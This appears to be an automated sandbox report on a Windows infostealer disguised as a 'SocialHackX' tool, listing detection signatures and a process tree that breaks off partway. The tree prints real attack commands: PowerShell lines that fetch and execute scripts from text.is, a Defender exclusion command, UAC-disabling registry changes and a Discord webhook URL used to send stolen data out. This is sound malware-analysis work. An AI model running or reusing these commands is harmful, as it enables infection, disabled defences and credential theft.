Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
15/05/2024, 13:38
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://t.ly/ESpzU
Resource
win10v2004-20240508-en
General
-
Target
https://t.ly/ESpzU
Malware Config
Extracted
https://text.is/QW7R/raw
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/files/0x000a000000023437-4682.dat WebBrowserPassView -
Nirsoft 1 IoCs
resource yara_rule behavioral1/files/0x000a000000023437-4682.dat Nirsoft -
Blocklisted process makes network request 7 IoCs
flow pid Process 86 5348 powershell.exe 87 2448 powershell.exe 89 2448 powershell.exe 91 2448 powershell.exe 97 7156 powershell.exe 110 6736 powershell.exe 114 6736 powershell.exe -
pid Process 5348 powershell.exe 7156 powershell.exe 2448 powershell.exe 6736 powershell.exe 6424 powershell.exe 4948 powershell.exe 6516 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation Updates.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation Updates.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation creeeed.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c21040.vbs Updates.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c93140.vbs Updates.exe -
Executes dropped EXE 19 IoCs
pid Process 4888 SocialHackX.exe 4120 SocialHackX.exe 4236 SocialHackX.exe 4368 SocialHackX.exe 5268 Updates.exe 6060 hackx.exe 6500 Updates.exe 6980 Updates.exe 7004 hackx.exe 5500 ddtk.exe 5692 ddtk.exe 2932 ddtk.exe 4236 ddtk.exe 2464 clipb.exe 5340 creeeed.exe 6312 specsss.exe 6844 sstxt.exe 6908 webpass.exe 6884 sstxt.exe -
Loads dropped DLL 64 IoCs
pid Process 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4120 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 4368 SocialHackX.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe 5692 ddtk.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\91967 = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe" Updates.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\74858 = "C:\\Users\\Admin\\AppData\\Local\\updates.vbs" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\45086 = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe" Updates.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs
flow ioc 54 discord.com 113 discord.com 115 discord.com 128 discord.com 146 discord.com 123 pastebin.com 55 discord.com 105 discord.com 125 discord.com 130 discord.com 138 discord.com 147 discord.com 104 discord.com 121 pastebin.com 129 discord.com 134 discord.com 140 discord.com 148 discord.com -
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 135 wtfismyip.com 49 ipinfo.io 108 wtfismyip.com 119 ipecho.net 127 wtfismyip.com 53 ipinfo.io 98 ipecho.net 99 ipecho.net 107 wtfismyip.com -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral1/files/0x000800000002341a-113.dat pyinstaller behavioral1/files/0x000a000000023434-4243.dat pyinstaller behavioral1/files/0x000a0000000234bb-4678.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6056 5340 WerFault.exe 146 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 specsss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString specsss.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings Updates.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings powershell.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 637576.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 43 IoCs
pid Process 468 msedge.exe 468 msedge.exe 4456 msedge.exe 4456 msedge.exe 4996 identity_helper.exe 4996 identity_helper.exe 644 msedge.exe 644 msedge.exe 5348 powershell.exe 5348 powershell.exe 5348 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 2448 powershell.exe 2448 powershell.exe 2448 powershell.exe 7156 powershell.exe 7156 powershell.exe 7156 powershell.exe 6516 powershell.exe 6516 powershell.exe 5268 Updates.exe 5268 Updates.exe 5268 Updates.exe 6516 powershell.exe 6736 powershell.exe 6736 powershell.exe 6736 powershell.exe 6980 Updates.exe 6980 Updates.exe 6980 Updates.exe 6908 webpass.exe 6908 webpass.exe 6908 webpass.exe 6908 webpass.exe 6424 powershell.exe 6424 powershell.exe 6424 powershell.exe 5272 msedge.exe 5272 msedge.exe 5272 msedge.exe 5272 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: 33 2848 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2848 AUDIODG.EXE Token: SeDebugPrivilege 5348 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 7156 powershell.exe Token: SeDebugPrivilege 6060 hackx.exe Token: SeDebugPrivilege 5268 Updates.exe Token: SeDebugPrivilege 6516 powershell.exe Token: SeDebugPrivilege 6736 powershell.exe Token: SeDebugPrivilege 7004 hackx.exe Token: SeDebugPrivilege 6980 Updates.exe Token: SeDebugPrivilege 5340 creeeed.exe Token: SeDebugPrivilege 6312 specsss.exe Token: SeDebugPrivilege 6424 powershell.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe 4456 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4456 wrote to memory of 1696 4456 msedge.exe 81 PID 4456 wrote to memory of 1696 4456 msedge.exe 81 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 4036 4456 msedge.exe 82 PID 4456 wrote to memory of 468 4456 msedge.exe 83 PID 4456 wrote to memory of 468 4456 msedge.exe 83 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84 PID 4456 wrote to memory of 4572 4456 msedge.exe 84
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.ly/ESpzU1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff99546f8,0x7ffff9954708,0x7ffff99547182⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:22⤵PID:4036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:82⤵PID:4572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:3540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:12⤵PID:2104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3912 /prefetch:82⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3912 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5356 /prefetch:82⤵PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:12⤵PID:1208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:12⤵PID:4160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:12⤵PID:3308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2040 /prefetch:12⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:12⤵PID:4644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:12⤵PID:940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5936 /prefetch:82⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6368 /prefetch:82⤵PID:3932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:644
-
-
C:\Users\Admin\Downloads\SocialHackX.exe"C:\Users\Admin\Downloads\SocialHackX.exe"2⤵
- Executes dropped EXE
PID:4888 -
C:\Users\Admin\Downloads\SocialHackX.exe"C:\Users\Admin\Downloads\SocialHackX.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile" "4⤵PID:5216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5348 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aaa.vbs"6⤵
- Checks computer location settings
PID:5340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess powershell.exe, cscript.exe, wscript.exe"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'https://text.is/somepowershell16/raw' -Method GET | Invoke-Expression"7⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448 -
C:\Users\Admin\AppData\Local\Updates.exe"C:\Users\Admin\AppData\Local\Updates.exe"8⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5268 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\updates.vbs"9⤵
- Checks computer location settings
- Adds Run key to start application
PID:6372 -
C:\Users\Admin\AppData\Local\Updates.exe"C:\Users\Admin\AppData\Local\Updates.exe"10⤵
- Executes dropped EXE
PID:6500
-
-
-
C:\Users\Admin\AppData\Local\Temp\ddtk.exe"C:\Users\Admin\AppData\Local\Temp\ddtk.exe" https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx9⤵
- Executes dropped EXE
PID:5500 -
C:\Users\Admin\AppData\Local\Temp\ddtk.exe"C:\Users\Admin\AppData\Local\Temp\ddtk.exe" https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hackx.exe"C:\Users\Admin\AppData\Local\Temp\hackx.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
-
-
-
-
-
-
-
C:\Users\Admin\Downloads\SocialHackX.exe"C:\Users\Admin\Downloads\SocialHackX.exe"2⤵
- Executes dropped EXE
PID:4236 -
C:\Users\Admin\Downloads\SocialHackX.exe"C:\Users\Admin\Downloads\SocialHackX.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile" "4⤵PID:4924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7156 -
